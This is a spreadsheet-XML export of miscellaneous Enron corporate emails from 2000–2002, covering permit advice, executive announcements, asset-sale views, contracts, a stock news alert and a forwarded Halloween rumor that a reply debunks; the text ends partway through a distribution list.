Neither of us believe you need any authorization to do what you did/are _x000D_
doing.  In our opinion, there is no change to your grandfathered status, nor _x000D_
a need to update your Title V permit._x000D_
_x000D_
Having said that, by now you probably know that the Texas legislature seems _x000D_
intent on closing out grandfathered status as of September 1st.  Our view is _x000D_
that your reworked engines have a clear shot at coming in under the VERP  _x000D_
entry to permitting.  I would also suggest you check the 1972 Standard _x000D_
Exemption No. 7.  One way of the other, you should plan to end the _x000D_
grandfather status of these engines soon._x000D_
_x000D_
On the Title V permit, if you have a General Operating Permit (most likely), _x000D_
it will be due for renewal in the short term (next year marks the 5th _x000D_
anniversary for most GOPs).  We suggest you incorporate any changes due to _x000D_
the engine reworks at that time.  If you have an issued SOP, do the same.  If _x000D_
your SOP is still pending, contact your Permit reviewer here at TNRCC for _x000D_
guidance._x000D_
So, will this e-mail answer your needs?_x000D_
_x000D_
Regards,_x000D_
Duncan Stewart_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 5 Nov 2001 15:02:01 -0800 (PST)</t>
  </si>
  <si>
    <t>Steve Harris on eSpeak</t>
  </si>
  <si>
    <t>_x000D_
Please join Steve Harris, Vice President of Transwestern Pipeline Commercial group on Tuesday, November 6, at 10:00 am Houston time for an eSpeak . _x000D_
_x000D_
Steve will discuss Transwestern, Enron's Texas to California pipeline, in an "open mike" session._x000D_
_x000D_
If you are unable to join Steve live, please submit your questions ahead of the event by logging on to http://ethink.enron.com/ and click eSpeak.</t>
  </si>
  <si>
    <t>Thu, 7 Dec 2000 01:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'susan.skarness@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'jeff.skilling@enron.com', 'cliff.baxter@enron.com', 'kenneth.lay@enron.com'})</t>
  </si>
  <si>
    <t>Thank you for stopping by the Boardroom yesterday to congratulate me on my _x000D_
college graduation.  It is due to Enron that I have been able to achieve this _x000D_
lifelong goal.  I have also received unfailing encouragement, support, and _x000D_
flexibility from Cliff during this time.  Had it not been for Cliff, I would _x000D_
not have been nearly so successful._x000D_
_x000D_
My deepest thanks to the three of you.</t>
  </si>
  <si>
    <t>Tue, 4 Dec 2001 12:47:23 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'david.gorte@enron.com'})</t>
  </si>
  <si>
    <t>RE: Letter to Mariner Board Members</t>
  </si>
  <si>
    <t xml:space="preserve">Rick,_x000D_
_x000D_
My views are as follows:_x000D_
_x000D_
- The sale of the deepwater assets makes sense due to their requirement of significant ongoing capital expenditures; the other assets of the company should also be auctioned off concurrently (although we would retain the right to continue to hold them if the offers received were inadequate); research into our commitments to Lehman as the sales advisor previously needs to be conducted (I have asked Don Miller in Corporate Development to research this)._x000D_
_x000D_
- The fact that the Mariner severance package is considerably better than the Enron package will be is a significant optical issue and not reducing it may create an issue with the creditors committee for the Enron bankruptcy._x000D_
_x000D_
- The extension of employment agreements and consulting agreements, in my opinion, should be for a shorter time period, say to March 31, 2002, again in light of the Enron situation and the optics to the creditors committee._x000D_
_x000D_
Dave_x000D_
_x000D_
-----Original Message-----_x000D_
From: Buy, Rick _x000D_
Sent: Tuesday, December 04, 2001 12:45 PM_x000D_
To: Gorte, David; Larson, Bradford_x000D_
Subject: FW: Letter to Mariner Board Members_x000D_
Importance: High_x000D_
Sensitivity: Confidential_x000D_
_x000D_
_x000D_
Any thoughts on this? Rick_x000D_
_x000D_
-----Original Message-----_x000D_
From: Cagle, Donna [mailto:DCAGLE@mariner-energy.com]_x000D_
Sent: Tuesday, December 04, 2001 11:10 AM_x000D_
To: Melendrez, Jesus; Buy, Rick; Keel, Allan; Josey, Scott D.; Clark,_x000D_
Richard; 'Bob Henderson'; 'mstrick443@earthlink.net'; Fox, Craig A.;_x000D_
'mark.e.haedicke@enron.com'; 'whalley@enron.com'_x000D_
Cc: Zelikovitz, Kelly; Bushman, Teresa G._x000D_
Subject: Letter to Mariner Board Members_x000D_
Importance: High_x000D_
Sensitivity: Confidential_x000D_
_x000D_
_x000D_
Please see attached letter from Scott Josey. Thank you._x000D_
_x000D_
Donna M. Cagle_x000D_
Executive Administrator to President &amp; CEO_x000D_
Mariner Energy, Inc._x000D_
580 WestLake Park Blvd., Suite 1300_x000D_
Houston, TX  77079_x000D_
281/584-5511 (phone)     281/584-5515 (fax)_x000D_
dcagle@mariner-energy.com_x000D_
_x000D_
 &lt;&lt;Board Letter 12-4-01.doc&gt;&gt; </t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 07:28:48 -0700 (PDT)</t>
  </si>
  <si>
    <t>Delainey's Cell #</t>
  </si>
  <si>
    <t xml:space="preserve">Kay, I lost my cell phone the other day... as such, can you please forward to me Dave's Cell phone, and work #'s to re-install. _x000D_
_x000D_
Thanks.  _x000D_
_x000D_
BT </t>
  </si>
  <si>
    <t>Mon, 9 Apr 2001 04:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'grant.oh@enron.com'})</t>
  </si>
  <si>
    <t>Crestar confirmations</t>
  </si>
  <si>
    <t xml:space="preserve">Grant,_x000D_
 Bruce called to say the language is okay.  Hunter also confirmed the _x000D_
language.  Please print out the attached confirms and forward them to _x000D_
Crestar.  Hopefully this is the last time._x000D_
</t>
  </si>
  <si>
    <t>Tue, 19 Dec 2000 01:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>WPSC contract</t>
  </si>
  <si>
    <t>Please see agreement below._x000D_
_x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490_x000D_
_x000D_
----- Forwarded by Debra Perlingiere/HOU/ECT on 12/19/2000 09:45 AM -----_x000D_
_x000D_
	"Kim Decell" &lt;kdecell@gassupplyconsulting.com&gt;_x000D_
	12/19/2000 11:26 AM_x000D_
		 _x000D_
		 To: &lt;dperlin@enron.com&gt;_x000D_
		 cc: "Sylvia Pollan" &lt;sylvia.s.pollan@enron.com&gt;_x000D_
		 Subject: WPSC contract_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Debra,_x000D_
_x000D_
Attached is the requested electronic version of the WPSC contract and_x000D_
Corporate Guaranty sent to Enron 12/14.  Given the cold weather conditions,_x000D_
WPSC is very anxious to get this agreement executed.  Hopefully, given the_x000D_
time we all spent resolving contract issues, this contract can be executed_x000D_
and sent to WPSC this week._x000D_
_x000D_
Please call me if you foresee any problem with this timetable._x000D_
_x000D_
Thanks,_x000D_
Kim_x000D_
_x000D_
Gas Supply Consulting, Inc._x000D_
(281)558-0735_x000D_
kdecell@gassupplyconsulting.com_x000D_
_x000D_
 - WPS Enron 3 mo ANR Swing FINAL 12-13-00.doc_x000D_
 - WPS Enron's Guaranty FINAL.doc</t>
  </si>
  <si>
    <t>frozenset({'raul.rizo-patron@enron.com'})</t>
  </si>
  <si>
    <t>Raul:_x000D_
Information on flights to Denver_x000D_
Leaving Houston on Thursday 31st at 3:30 - Arriving Denver ar 4:54 pm on _x000D_
flight #35_x000D_
Leaving Denver on Monday the 1st at 4:27 - Arriving Houston at 7:46pm on _x000D_
flight #379._x000D_
Hope this works!_x000D_
Ben_x000D_
3-7998</t>
  </si>
  <si>
    <t>Tue, 22 Jan 2002 14:41:44 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jonathan.mckay@enron.com', 'jared.kaiser@enron.com', 'frank.vickers@enron.com', 'judy.townsend@enron.com', 'andrea.ring@enron.com', 'f..brawner@enron.com', 'craig.taylor@enron.com', 'chuck.ames@enron.com'})</t>
  </si>
  <si>
    <t>Meeting, Wednesday, January 23 at 10:00am at the Houstonian</t>
  </si>
  <si>
    <t>Please attend a meeting at the Houstonian on Wednesday, 1/23/02 from 10:00 am to 1:00 pm for a welcome and overview presented by UBS senior management.  Breakfast treats will be served starting at 9:00 am.  _x000D_
_x000D_
The meeting will begin at 10:00 am sharp.</t>
  </si>
  <si>
    <t>Mon, 15 Oct 2001 15:31:47 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jamie.wachel@enron.com'})</t>
  </si>
  <si>
    <t>Start Date</t>
  </si>
  <si>
    <t>Dana,_x000D_
_x000D_
I was wondering if you have set a transfer date yet?  Please let me know so I can relay the information to Bill Hare._x000D_
_x000D_
Thanks,_x000D_
Jamie _x000D_
EWS Staffing_x000D_
ext. 5-8277</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 17:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'alerts@equityalert.com'})</t>
  </si>
  <si>
    <t>Your News Alert for JDSU</t>
  </si>
  <si>
    <t>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D_x000D_
As requested, your News Alert for JDSU_x000D_
follows from EquityAlert.com._x000D_
To edit/discontinue your alerts please refer to end of message._x000D_
PLEASE REVIEW THE NOTICE AND DISCLAIMER BELOW_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D_x000D_
_x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=_x000D_
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D_x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=3D-=3D-=3D-=3D-=3D Paid Advertisement -=3D-=_x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-_x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=_x000D_
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D_x000D_
_x000D_
Looking for an emerging growth company in a transition between_x000D_
research and global commercialization?_x000D_
_x000D_
The level of activity surrounding Rentech's Gas-to-Liquids process_x000D_
technology has never been greater. Rentech's work with Texaco under_x000D_
the Technical Services Agreement continues. Rentech is also_x000D_
proceeding on several different fronts related to natural gas and_x000D_
GTL._x000D_
For more information click here_x000D_
http://205.210.134.51/a1.asp?ID=3D1259aa_x000D_
_x000D_
AOL USERS: copy &amp; paste the link above into your browser._x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=_x000D_
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D_x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=_x000D_
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D_x000D_
_x000D_
_x000D_
WaveSplitter Announces New Vice President of Engineering=0F=3DSeasoned Tele=_x000D_
com_x000D_
Executive Frank Liang Joins Top Management Team_x000D_
_x000D_
FREMONT, Calif., Dec 12, 2000 /PRNewswire via COMTEX/ -- WaveSplitter_x000D_
Technologies, Inc., a worldwide supplier of fiber-optic components for opti=_x000D_
cal_x000D_
amplifier and DWDM systems, today announced the appointment of Frank Liang =_x000D_
as_x000D_
Vice President of Engineering to champion WaveSplitter's fused-fiber produc=_x000D_
t_x000D_
development efforts._x000D_
_x000D_
With over fifteen years of experience in the fiber optics industry, Frank=_x000D_
=20_x000D_
Liang_x000D_
has an extensive background in developing and manufacturing fiber-optic_x000D_
components, instrumentation, and manufacturing automation. Prior to joining_x000D_
WaveSplitter, Liang was a Senior Director of Photonic Technologies at E-Tek_x000D_
Dynamics/JDS Uniphase where he led the engineering department in product_x000D_
development of fiber-optic components and integrated modules, yield_x000D_
improvements, and manufacturing automation. As one of the earliest employee=_x000D_
s=20_x000D_
at_x000D_
E-Tek, he was a key contributor in building infrastructure and ramping prod=_x000D_
uct_x000D_
development and processes as the company grew._x000D_
_x000D_
His professional accomplishments include designing, developing, and buildin=_x000D_
g=20_x000D_
the_x000D_
world's first fiber-optic coupler production workstation for a high-yield_x000D_
mass-production environment, developing scalable semiconductor laser diode=_x000D_
=20_x000D_
life_x000D_
test systems for pump laser testing, and creating manufacturing automation_x000D_
systems for collimators/DWDM filters. He also led engineering teams to deve=_x000D_
lop_x000D_
several new fiber-optic components and custom modules such as interleavers,=_x000D_
=20_x000D_
AWGs_x000D_
and integrated modules. His accomplished career also includes being awarded_x000D_
several patents in manufacturing automation and tunable laser sources. As V=_x000D_
ice_x000D_
President of Engineering at WaveSplitter, Frank will spearhead initiatives =_x000D_
to_x000D_
develop new fused-fiber devices, enhance manufacturability for volume_x000D_
production, and boost productivity improvements._x000D_
_x000D_
"We are extremely pleased to have such a seasoned industry professional joi=_x000D_
n=20_x000D_
the_x000D_
WaveSplitter executive team," said Bill Diamond, President and CEO of_x000D_
WaveSplitter. "Frank has an extraordinary track record in championing desig=_x000D_
n=20_x000D_
and_x000D_
engineering initiatives in fiber optics, and will direct efforts to enhance=_x000D_
=20_x000D_
our_x000D_
fused fiber product portfolio to address the needs of our growing customer_x000D_
base."_x000D_
_x000D_
About WaveSplitter Technologies, Inc._x000D_
_x000D_
WaveSplitter Technologies, Inc. develops, manufactures and markets reliable=_x000D_
,_x000D_
highly scalable, cost-effective components for optical amplifier and DWDM_x000D_
systems for both long-haul and metropolitan area network applications._x000D_
WaveSplitter's high-performance fiber and planar lightwave circuit componen=_x000D_
ts_x000D_
increase network bandwidth capabilities and offer a unique combination of l=_x000D_
ow_x000D_
signal loss and modular expandability at an economical value. WaveSplitter =_x000D_
was_x000D_
founded in 1996 and is headquartered in Fremont, California._x000D_
_x000D_
NOTE: WaveSplitter is a trademark of WaveSplitter Technologies, Inc. All ot=_x000D_
her_x000D_
trademarks are the properties of their respective owners._x000D_
_x000D_
SOURCE WaveSplitter Technologies, Inc._x000D_
_x000D_
_x000D_
CONTACT:          Lisa Blair of WaveSplitter Technologies, Inc., 510-580-88=_x000D_
88,_x000D_
ext. 243, or lisa_blair@wavesplitter.com; or Betsy Taub of Upstart_x000D_
Communications, 510-457-3110, or btaub@upstart.com, for WaveSplitter_x000D_
Technologies, Inc._x000D_
_x000D_
URL:              http://www.wavesplitter.com_x000D_
http://www.prnewswire.com_x000D_
_x000D_
(C) 2000 PR Newswire.  All rights reserved._x000D_
_x000D_
-0-_x000D_
_x000D_
_x000D_
KEYWORD:          California_x000D_
INDUSTRY KEYWORD: CPR_x000D_
SUBJECT CODE:     PER_x000D_
_x000D_
_x000D_
_x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=_x000D_
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D_x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=3D-=3D-=3D-=3D-=3D Paid Advertisement -=3D-=_x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-_x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=_x000D_
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D_x000D_
_x000D_
Looking for an emerging growth company in a transition between_x000D_
research and global commercialization?_x000D_
_x000D_
For more information click here_x000D_
http://205.210.134.51/a1.asp?ID=3D1260aa_x000D_
_x000D_
AOL USERS: copy &amp; paste the link above into your browser._x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=_x000D_
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D_x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=_x000D_
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D_x000D_
_x000D_
****************** TO EDIT YOUR EQUITY ALERTS ********************_x000D_
To unsubscribe or edit your alerts, visit_x000D_
http://www.equityalert.com/alerts.asp?uid=3Dalewis34&amp;xid=3D40352_x000D_
******************************************************************_x000D_
_x000D_
***IMPORTANT NOTICE AND DISCLAIMER REGARDING THIS COURTESY EMAIL**_x000D_
At your request, as a subscriber to our service, this email alert_x000D_
is being sent to you as a courtesy and is for information purposes_x000D_
only.  We are a financial news re-distributor.  We are not an_x000D_
investment advisory and do not purport to tell or suggest which_x000D_
companies you should monitor or which securities you should_x000D_
purchase or sell._x000D_
In addition to the information regarding the company you are_x000D_
monitoring (the =01&amp;Monitored Company=018), this email contains an_x000D_
advertisement describing a product, service or company for which we_x000D_
received a fee, at our normal advertising rates of $55 per 1,000 e-_x000D_
mails (subject to volume and other discounts), from the advertising_x000D_
company.  In addition, not withstanding our policy of prohibiting_x000D_
employees from buying or selling securities of an advertising_x000D_
company for a period of 20 days following dissemination of the_x000D_
advertisement, we may not be able to effectively monitor our_x000D_
employees to ensure compliance with the same. Consequently, there_x000D_
may be sales and/or purchases of such securities by our employees_x000D_
prior to, during and immediately following the dissemination of the_x000D_
advertisement._x000D_
Please note that (1) this email may not contain the full text of_x000D_
the press release issued by, or the research or other reports_x000D_
regarding, the Monitored Company; and (2) the text of the_x000D_
advertisement, the press release and/or reports were obtained from_x000D_
third party sources and were not written, generated or edited by_x000D_
us; accordingly, we make no representations or give any assurance_x000D_
as to the accuracy or completeness, nor have we conducted any_x000D_
independent investigations of, the disclosures regarding the_x000D_
subject matter of such releases and reports._x000D_
Please note that links to the advertising company and/or Monitored_x000D_
Company are provided for your convenience.  We assume no obligation_x000D_
for the content of such sites._x000D_
All information contained herein should be independently verified_x000D_
by you with the advertising company or with Monitored Company or_x000D_
any other sources you prefer._x000D_
[THIS IS ONLY A SUMMARY OF, AND IS QUALIFIED IN ITS ENTIRETY BY_x000D_
REFERENCE TO, THE =01&amp;EQUITYALERT SUBSCRIBER AGREEMENT AND_x000D_
DISCLAIMER.=018 PLEASE VISIT_x000D_
http://www.equityalert.com/home/disclaim.asp_x000D_
FOR ACCESS TO OUR COMPLETE DISCLAIMER]_x000D_
******************************************************************</t>
  </si>
  <si>
    <t>Tue, 16 Jan 2001 02:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>CAED docs</t>
  </si>
  <si>
    <t>Kathleen,_x000D_
_x000D_
There were three original assignment and assumption agreements:  One of CAED _x000D_
I (GE) and two for CAED II (one for GE, one for ABB).  I only see two in my _x000D_
packet, and only two are referenced in the transmittal letter.  HELP!!!!!!!!  _x000D_
This is obviously urgent._x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Thu, 11 Oct 2001 10:18:47 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: FW: Forward Warning</t>
  </si>
  <si>
    <t>you goofball_x000D_
_x000D_
go to www.snopes2.com , click on rumors of war, and then go to the first en=_x000D_
try about halloween._x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Ward, Kim S (Houston) =20_x000D_
Sent:=09Thursday, October 11, 2001 12:04 PM_x000D_
To:=09Angie Conner (E-mail); Ann Sutton (E-mail); Brad Fagan (E-mail); Cath=_x000D_
y Pocock (E-mail); Chris Todd (E-mail); Christopher Smith (E-mail); Cindy T=_x000D_
arsi (E-mail); Dave Breish (E-mail); David Hutchens (E-mail); David Payne (=_x000D_
E-mail); Elizabeth Jordan (E-mail); Eric Strickland (E-mail); Gayleen Barre=_x000D_
tt (E-mail); Ginger&amp; Michael Brown (E-mail); Harriet Turk (E-mail); Herman =_x000D_
Green (E-mail); Slone, Jeanie; Jerry Ward (E-mail); John Schilke (E-mail); =_x000D_
Kathy Wright (E-mail); Karla Dailey (E-mail); Linda Ward Elam (E-mail); Lis=_x000D_
a Rosenberg (E-mail); Melissa Reese (E-mail); Matt Mitten (E-mail); Mike &amp; =_x000D_
Rosalia Nolan (E-mail); Mike Wardell (E-mail); Monica Padilla (E-mail); Nat=_x000D_
alie &amp; Bret Boehmer (E-mail); Sally McElroy (E-mail); Scott Connelly (E-mai=_x000D_
l); Shawn McElmoyl (E-mail); Stanton Scott (E-mail); Susie Lejune (E-mail);=_x000D_
 Theresa Cline (E-mail); Tina lovett (E-mail); Wayne Brown (E-mail); Wes Ke=_x000D_
rsey (E-mail); Yonnie Waller (E-mail); Olinger, Kimberly S.; Brewer, Stacey=_x000D_
 J.; 'wenderachels@aol.com'; Semperger, Cara; Fuller, Dave; Lucci, Paul T.;=_x000D_
 Nemec, Gerald; Vann, Suzanne; Heintzelman, Pete; McDonald, Rob; Vint, Pete=_x000D_
r; Foster, Chris H.; Mainzer, Elliot; Wente, Laura; Platter, Phillip; 'ssca=_x000D_
stle@srpnet.com'; Gerard, Camille; 'jana.morse@dynegy.com'; Cross, Edith EE=_x000D_
S; 'george.denos@neg.pge.com'; 'brad.king@usa.conoco.com'; 'lawrence.pope@h=_x000D_
aliburton.com'; Arnold, John; 'lisabarnwell1@yahoo.com'; 'kward1@houston.rr=_x000D_
.com'; Miller, Stephanie; 'tomd1966@yahoo.com'; 'antlulu2@aol.com'; Kennedy=_x000D_
, Susan L.; 'ilandman@verizon.net'_x000D_
Subject:=09FW: FW: Forward Warning_x000D_
_x000D_
_x000D_
_x000D_
 I received this email today from a very good friend of mine who has a lot =_x000D_
of close friends from India.  This letter is to one of those close friends.=_x000D_
  I don't know if I should pass it around but I want everyone I know to be =_x000D_
aware._x000D_
_x000D_
Kim_x000D_
&gt; &gt;_x000D_
&gt; &gt;This is worth forwarding, just incase. . ._x000D_
&gt; &gt;_x000D_
&gt; &gt;=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D_x000D_
&gt; &gt;=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D_x000D_
&gt; &gt;_x000D_
&gt; &gt;PLEASE READ!_x000D_
&gt; &gt;Subject: Malls on 10/31_x000D_
&gt; &gt;_x000D_
&gt; &gt;Hey guys..I dont want to scare anyone..but its better safe than sorry,_x000D_
&gt; &gt;right?? This is not just a foward I recieved..Its from one of my_x000D_
&gt; &gt;colleages at JPMorgan. It's been sent around within the firm, I wanted_x000D_
&gt; &gt;to pass it on just in case._x000D_
&gt; &gt;Hi All -_x000D_
&gt; &gt;I think you all know that I don't send out hoaxes and don't_x000D_
&gt; &gt;do the reactionary thing and send out anything that crosses my_x000D_
&gt; &gt;path._x000D_
&gt; &gt;This one,  however, is a friend of a friend and I've given it_x000D_
&gt; &gt;enough credibility in my mind that I'm writing it up and sending it out_x000D_
&gt; &gt;to all of you._x000D_
&gt; &gt;My friend's friend was dating a guy from Afghanistan up until a month_x000D_
&gt; &gt;ago.  She had a date with him around 9/6 and was stood up. She was_x000D_
&gt; &gt;understandably upset and went to his home to find it completely emptied._x000D_
&gt; &gt;On 9/10, she received a letter from her boyfriend explaining that_x000D_
&gt; &gt;he_x000D_
&gt; &gt;wished he could tell her why he had left and that he was sorry it_x000D_
&gt; &gt;had to be like that.  The part worth mentioning is that he BEGGED her_x000D_
&gt; &gt;not to get on any commercial airlines on 9/11 and to not to go any malls_x000D_
&gt; &gt;on Halloween._x000D_
&gt; &gt;As soon as everything happened on the 11th, she called the FBI and has_x000D_
&gt; &gt;since turned over the letter. This is not an email that I've received_x000D_
&gt; &gt;and decided to pass on.  This came from a phone conversation with a_x000D_
&gt; &gt;long-time friend of mine last night._x000D_
&gt; &gt;I may be wrong, and I hope I am.  However, with one of his warnings_x000D_
&gt; &gt;being correct and devastating, I'm not willing to take the chance on the_x000D_
&gt; &gt;second and wanted to make sure that people I cared about had the same_x000D_
&gt; &gt;information that I did._x000D_
&gt; &gt;Laura Katsis_x000D_
&gt; &gt;Implementation Specialist_x000D_
&gt; &gt;714/921-5424_x000D_
&gt; &gt;lkatsis@volt.com &lt;mailto:lkatsis@volt.com&gt;_x000D_
&gt; &gt;OpsVolt_Track@volt.com &lt;mailto:OpsVolt_Track@volt.com&gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;--------------------------------------------------------------_x000D_
&gt; &gt;Reminder:  E-mail sent through the Internet is not secure._x000D_
&gt; &gt;Do not use e-mail to send us confidential information_x000D_
&gt; &gt;such as credit card numbers, changes of address, PIN_x000D_
&gt; &gt;numbers, passwords, or other important information._x000D_
&gt; &gt;Do not e-mail orders to buy or sell securities, transfer_x000D_
&gt; &gt;funds, or send time sensitive instructions. We will not_x000D_
&gt; &gt;accept such orders or instructions.  This e-mail is not_x000D_
&gt; &gt;an official trade confirmation for transactions executed_x000D_
&gt; &gt;for your account.  Your e-mail message is not private in_x000D_
&gt; &gt;that it is subject to review by the Firm, its officers,_x000D_
&gt; &gt;agents and employees._x000D_
&gt; &gt;--------------------------------------------------------------_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;**********************************************************************_x000D_
&gt; &gt;This e-mail is the property of Enron Corp. and/or its relevant affiliate_x000D_
&gt; &gt;and may contain confidential and privileged material for the sole use of_x000D_
&gt; &gt;the intended recipient (s). Any review, use, distribution or disclosure_x000D_
by_x000D_
&gt; &gt;others is strictly prohibited. If you are not the intended recipient (or_x000D_
&gt; &gt;authorized to receive for the recipient), please contact the sender or_x000D_
&gt; &gt;reply to Enron Corp. at enron.messaging.administration@enron.com and_x000D_
delete_x000D_
&gt; &gt;all copies of the message. This e-mail (and any attachments hereto) are_x000D_
not_x000D_
&gt; &gt;intended to be an offer (or an acceptance) and do not create or evidence_x000D_
a_x000D_
&gt; &gt;binding and enforceable contract between Enron Corp. (or any of its_x000D_
&gt; &gt;affiliates) and the intended recipient or any other party, and may not b=_x000D_
e_x000D_
&gt; &gt;relied on by anyone as the basis of a contract by estoppel or otherwise._x000D_
&gt; &gt;Thank you._x000D_
&gt; &gt;**********************************************************************_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; __________________________________________________________________x000D_
&gt; Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.as=_x000D_
p_x000D_
&gt;_x000D_
&gt;</t>
  </si>
  <si>
    <t>Fri, 25 Aug 2000 08:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>CAPACITY OFFER</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Chris Germany/HOU/ECT on 08/25/2000 03:12 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"ANNE FILAS" &lt;afilas@keyspanenergy.com&gt; on 08/25/2000 02:17:45 PM_x000D_
To: sjfuel@mindspring.com, supply@castlepower.com, isiduff@aol.com, sjfuel _x000D_
&lt;sjfuel@aol.com&gt;, "Angerman, Darren" &lt;Darren_Angerman@transcanada.com&gt;, _x000D_
"Baker, Sharon" &lt;Sharon.baker@williams.com&gt;, "Balmer, Chris" _x000D_
&lt;chris.balmer@lgeenergy.com&gt;, "Baratz, Phil" &lt;pbaratz@totalnrg.com&gt;, "Barth, _x000D_
Gerry" &lt;GBBarth@NJNG.com&gt;, "Bender, Cary" &lt;cbender22@aol.com&gt;, "Bosco, Chris" _x000D_
&lt;CSB@ptrcom.com&gt;, "Botero, Claudia" &lt;claudia.e.botero@usa.conoco.com&gt;, _x000D_
"Breslin, James" &lt;james.breslin@pseg.com&gt;, "Brown, Darryl" _x000D_
&lt;daryl.brown@williams.com&gt;, "Burgess, James" &lt;JBurgess@Noblegas.com&gt;, _x000D_
"Cammarata, Ed" &lt;ecammarata@sempratrading.com&gt;, "Campo, Thomas" _x000D_
&lt;tcampo@njne.com&gt;, "Casas, Melanie" &lt;mcasas@hess.com&gt;, "Chin, Debbie" _x000D_
&lt;Dchin@allenergy.com&gt;, "Clark, Tom" &lt;tom.clark@et.pge.com&gt;, "Crowley, Jackie" _x000D_
&lt;jcrowley@sempratrading.com&gt;, "Cruikshank, Ken" _x000D_
&lt;cruikshankk@conedsolutions.com&gt;, "Dahlem, David" &lt;david.dahlem@et.pge.com&gt;, _x000D_
"Didas, Rory" &lt;rory.didas@lgeenergy.com&gt;, "Ferreira, Kathy" _x000D_
